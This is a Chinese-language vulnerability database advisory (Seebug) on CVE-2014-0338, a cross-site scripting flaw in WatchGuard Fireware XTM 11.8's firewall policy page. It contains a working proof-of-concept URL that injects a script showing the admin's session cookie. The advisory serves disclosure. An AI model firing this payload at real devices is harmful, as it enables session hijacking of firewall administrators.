Lucene search
RootSSV:61820HistoryMar 17, 2014 - 12:00 a.m.
WatchGuard Fireware XTM 'poll_name'参数跨站脚本漏洞
2014-03-1700:00:00
Root
www.seebug.org
22
EPSS
0.004
Percentile
74.2%
Bugtraq ID:66210
CVE ID:CVE-2014-0338
WatchGuard Fireware XTM是一款多功能防火墙管理软件。
WatchGuard Fireware XTM不正确过滤用户提交给"poll_name"参数的数据,允许远程攻击者利用漏洞注入恶意脚本或HTML代码,当恶意数据被查看时,可获取敏感信息或劫持用户会话。
0
WatchGuard Fireware XTM 11.8
目前没有详细解决方案提供:
http://www.watchguard.com/products/fireware-xtm.asp
https://10.200.210.100:8080/firewall/policy?pol_name=qqq";><body
onload=alert(document.cookie)>&service=Any&is_new=1
Related
nvd
nvd
CVE-2014-0338
2014-03-16 14:06:45
cert
cert
WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability
2014-03-13 00:00:00
cve
cve
CVE-2014-0338
2014-03-16 14:06:45
prion
prion
Cross site scripting
2014-03-16 14:06:00
cvelist
cvelist
CVE-2014-0338
2014-03-16 10:00:00